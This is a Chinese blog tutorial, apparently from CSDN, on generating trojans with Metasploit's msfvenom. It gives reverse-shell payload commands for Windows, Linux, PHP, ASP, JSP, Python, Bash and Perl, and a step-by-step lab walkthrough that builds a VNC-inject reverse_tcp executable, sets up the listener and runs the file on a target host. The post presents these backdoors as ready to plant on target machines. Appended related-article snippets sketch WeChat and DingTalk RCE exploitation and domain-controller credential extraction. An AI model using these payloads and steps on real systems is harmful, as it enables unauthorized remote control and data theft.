【网络安全渗透测试零基础入门必知必会】之Metasploit -- 木马生成原理和方法,零基础入门到精通,收藏这篇就够了

最新推荐文章于 2025-10-09 17:49:30 发布
原创 最新推荐文章于 2025-10-09 17:49:30 发布 · 734 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #网络 #安全

前言

这是大白给粉丝盆友们整理的网络安全渗透测试入门阶段木马免杀问题渗透与防御第1篇。

喜欢的朋友们,记得给大白点赞支持和收藏一下,关注我,学习黑客技术。

一、生成方式:利用msf模块中的msfvenom模块

二、原理:msfvenom是msfpayload、msfencode的结合体,利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线

三、msfvenom命令行选项如下

-p, --payload 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定

-l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all

-n, --nopsled 为payload预先指定一个NOP滑动长度

-f, --format 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)

-e, --encoder [encoder] 指定需要使用的encoder(编码器)

-a, --arch 指定payload的目标架构,这里x86是32位,x64是64位 -platform 指定payload的目标平台

-s, --space 设定有效攻击荷载的最大长度

-b, --bad-chars 设定规避字符集,比如: '\x00\xff'

-i, --iterations 指定payload的编码次数

-c, --add-code 指定一个附加的win32 shellcode文件

-x, --template 指定一个自定义的可执行文件作为模板

-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行 --payload-options 列举payload的标准选项

-o, --out 保存payload

-v, --var-name 指定一个自定义的变量,以确定输出格式

–shellest 最小化生成payload

-h, --help 查看帮助选项 --help-formats 查看msf支持的输出格式列表

这里举出一些利用msfvenom生成shell的命令:

Linux:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

Windows:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

PHP:

msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php

cat shell.php | pbcopy && echo '<?php ’ | tr -d ‘\n’ > shell.php && pbpaste >> shell.php

ASP:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp

JSP:

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

Python:

msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py

Bash:

msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh

Perl:

msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl

以上是基本的生成后门木马,只要想方设法放到目标机器上,并运行。在本地监听端口即可,但是你需要有一个公网的ip

四、使用方法

1、msfvenom --list platforms 显示支持的平台

2、msfvenom --list formats 显示支持的格式

3、msfvenom --list archs 显示支持的架构

4、msfvenom --list encoders 显示支持的编码器

5、生成木马

目标主机:192.168.1.129(win7 x64)

攻击机:192.168.1.33

攻击端口:12121

生成木马:msfvenom --arch x64 --platform windows -p windows/x64/vncinject/reverse_tcp lhost=192.168.1.133 lport=12121 -f exe -o /root/win64.exe

6、进入监听模块 use exploit/multi/handler

7、设置payload反弹 set payload windows/x64/vncinject/reverse_tcp

8、查看需要设置的参数:show options

9、设置攻击机ip:set lhost 192.168.1.133

10、设置攻击端口:set lport 12121

11、将生成的exe文件上传到目标主机并运行

12、run攻击

13、攻击机的监控画面

14、目标主机画面

【漏洞复现】钉钉rce反弹shell
qq_50854662的博客
01-05 1741
【漏洞复现】钉钉rce反弹shell
微信RCE漏洞复现
m0_46171781的博客
05-02 3772
微信RCE漏洞复现 一、涉及版本: 微信 Windows 版:< 3.1.2.141 根据腾讯安全中心的公告,这是因为chrome浏览器使用的V8引擎存在安全问题导致的。该漏洞仅影响windows版本的PC版微信,且只影响3.2.1.141以下版本 二、复现过程: 1.开启cobalt strike监听 2.使用cobalt strike生成shellcode 3.将生成的shellcode进行处理,将\替换为,0 4.写入js代码中 5.在html文件中调用此js代码 6.在靶机中使用微信
一文带你进入黑客的世界:Kali Linux如何使用Metasploit渗透测试工具生成病毒木马
wholeliubei的博客
10-09 1005
本文介绍了使用Metasploit框架进行网络安全测试的方法,重点演示了针对Windows系统的"永恒之蓝"漏洞攻击流程。文章首先说明了获取IP地址后通过端口扫描发现漏洞服务的重要性,接着详细讲解了Metasploit的基本功能使用步骤,包括模块选择、参数配置攻击执行等关键环节。通过实验展示了如何利用该漏洞获取目标系统权限,并介绍了meterpreter后渗透工具的基本命令。最后强调本文内容仅用于合法安全研究,严禁用于非法用途。
反弹Shell,看这一
Appleteachers的博客
04-24 1544
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹个shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell呢
msfvenom
jsd2root的博客
11-02 598
1.msfvenom的基本用法: Options:     -p, --payload    payload>       指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定     -l, --list       [module_type]   列出指定模块的所有可用资源. 模块类型包括: pa
钉钉 RCE 漏洞
god_Zeo的安全博客
02-16 3504
钉钉 RCE 漏洞 影响版本 版本:6.3.5 https://dtapp-pub.dingtalk.com/dingtalk-desktop/win_installer/Release/DingTalk_v6.3.5.11308701.exe 触发方式 dingtalk://dingtalkclient/page/link?url=127.0.0.1/test.html&pc_slide=true 成功复现 POC 参考https://github.com/crazy0x70/dingtal
精选资源
小迪安全网络安全零基础入门课程 奇安信网络安全渗透教学课程-18.3G网盘链接提取码下载.txt
02-06
网络安全零基础入门课程是一个适合初学者的系统学习网络安全知识的平台,通过本课程的学习,学习者可以掌握网络安全的基础理论知识,学会使用网络安全工具进行基础操作,并在实践中培养对网络安全问题的识别解决...
网络安全基于Metasploit Framework的后渗透测试技术:利用MSF进行木马生成与持久化控制
05-09
适合人群:具备一定网络安全知识技术基础的安全研究人员、渗透测试员以及对网络安全感兴趣的IT从业者。 使用场景及目标:①了解MSF各模块的功能及其在实际渗透测试中的应用;②掌握msfvenom工具的使用方法,能...
Metasploit -- 木马生成原理方法
Web安全工具库
05-07 2486
以前的人,要疯要癫要崩溃,都特别戏剧化,比如披头散发,涕泗横流,瞠目结舌等等。现在的人不会,他就静静地坐在那里,面无表情,不声不响,看着很正常,但禁不起触碰。你上前轻轻碰一下,问一句,他就垮了,就崩溃了。。。 ---- 网易云热评 一、生成方式:利用msf模块中的msfvenom模块 二、原理:msfvenom是msfpayload、msfencode的结合体,利用msfvenom生成木马...
网络安全渗透测试】基于Metasploit框架的MSF工具使用指南:漏洞利用与反向Shell攻击技术实践
最新发布
11-30
适合人群:网络安全初学者、渗透测试人员、安全运维人员,具备基本操作系统网络知识的技术人员; 使用场景及目标:①学习MSF框架在真实环境中进行漏洞利用与渗透测试的操作流程;②掌握shellcode生成、监听上线、...
全网最全的 Cobalt Strike 使用教程-内网渗透之域控攻击!黑客技术零基础入门精通教程建议收藏
wholeliubei的博客
08-14 1367
本文介绍了攻击域控制器时提取ntds.dit文件的多种方法。ntds.dit存储了域内关键数据,但被系统锁定无法直接读取。文章详细讲解了通过ntdsutil.exe创建快照并拷贝文件、使用vssadmin/vssown.vbs工具管理卷影拷贝、利用IFM方式生成副本,以及diskshadow工具操作卷影服务等方法。这些技术需在获取域控权限后使用,文中强调该内容仅用于学习研究。通过多种技术对比,为安全研究人员提供了完整的域控数据提取方案。
RCE漏洞复现
qq_43757105的博客
09-14 1185
目录 漏洞描述 漏洞等级 影响版本 准备阶段 RCE漏洞复现具体步骤: Win2008搭建好环境且ip 地址为192.168.132.132​​ Win7可以访问到在win2008 phpstudy 上提前搭建的网站​​ Win7打开bp,设置好代理访问win2008​​ send to repeater​​​​ 在请求行加一行Accept-Charset: 并且还要把“deflated”面的空格删除(不删除无法执行命令) 准备执行命令system('whoami');
Metasploit(MSF)生成木马教程,一次windows入侵记录(教程)
weixin_62860907的博客
07-18 697
打开靶机(我使用的是中国蚁剑,靶机中我上传了后门,上传了生成木马5E.exe)第二部,生成木马,设置攻击机的IP地址以及接收shell的端口。我也是初学这,进去之后都不知道该干嘛,提权什么的,一概不会。第三步,开启msf控制台,设置payload,开启监听。首先查看一下IP地址吧。上线成功,拍张照片看看。
Metasploit (MSF) 使用并生成木马payload
2301_79642494的博客
10-29 2778
show: 查看选项 //当进入模块可是使用show option查看模块需要的参数选项,使用show targetsshow payloads可查看targetpayload选项参数。若出现handler failed to bind to说明该端口已经被占用,此时要把靶机的木马文件删除并重启靶机(因为木马一旦运行就不会停止,一直占用端口),再从头开始建立木马。如果需要退出删除session会话可以使用session -k 会话号,同样使用-K可以删除全部session会话。
Redis-RCE漏洞复现
Seizerz的博客
11-19 2093
一、简介 Redis:REmote DIctionary Server(Redis) 是一个由Salvatore Sanfilippo写的key-value存储系统。Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 Redis RCE漏洞来源:https://lorexxar.cn/201...
Tomcat RCE 漏洞复现(CVE-2019-0232)
热门推荐
大哥一声吼
04-18 1万+
漏洞影响范围,直接看官方公告: 总结起来漏洞影响范围如下: tomcat 7.0.04之前 tomcat 8.5.40之前 tomcat 9.0.19之前 版本都会影响 (tomcat 服务器版本在受影响范围内的小伙伴可以打一波补丁了) 测试环境 tomcat 版本8.5.31 jdk版本8.121 漏洞利用前提 修改conf里面的内容 第一处:con...
CVE-2018-1270-Spring Messaging RCE漏洞复现
m0_58596609的博客
04-22 6417
CVE-2018-1270-Spring Messaging RCE漏洞复现
ThinkPHP2-RCE漏洞复现
weixin_73180072的博客
09-10 1207
这个函数会接收用户的输入,并将其存储在一个缓存文件中,以供后续使用。然而,由于没有对用户输入进行适当的过滤验证,攻击者可以构造一个包含恶意代码的输入数据,并将其提交给该函数。当其他用户访问该应用程序时,这些恶意代码就会被执行,攻击者就可以控制整个服务器。造成该漏洞的原因在于ThinkPHP 2.x版本中,某些函数没有对用户输入进行严格的过滤验证,导致攻击者可以通过构造恶意输入来绕过安全防护,执行恶意代码。攻击者通过利用该漏洞,可以在服务器上执行任意PHP代码,从而控制服务器。成功连接,获取shell。
Apereo CAS 4.1/4.x 反序列化RCE漏洞 漏洞复现
ADummy的博客
02-20 2307
Apereo CAS 4.1反序列化RCE漏洞 by ADummy 0x00利用路线 ​ 构造(可以使用ysoserial)可执行命令的序列化对象—>发送给目标61616端口—>访问web管理页面,读取消息,触发漏洞—>代码执行 0x01漏洞介绍 ​ Apereo CAS是企业级单点登录系统。CAS试图通过Apache Commons Collections库对对象进行反序列化的过程中存在一个问题,该案例引起了RCE漏洞。Apereo Cas一般是用来做身份认证的,所以有一定的攻击
网络工程师软考零基础入门笔记与源码解析
并规划了明确的成长路线图:先夯实网络与系统基础,再学习网络安全原理(加密技术、身份认证、防火墙配置)、渗透测试工具(如Wireshark、Nmap、Metasploit),进而考取CISSP、CISP、CCNA Security等相关认证,最终...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值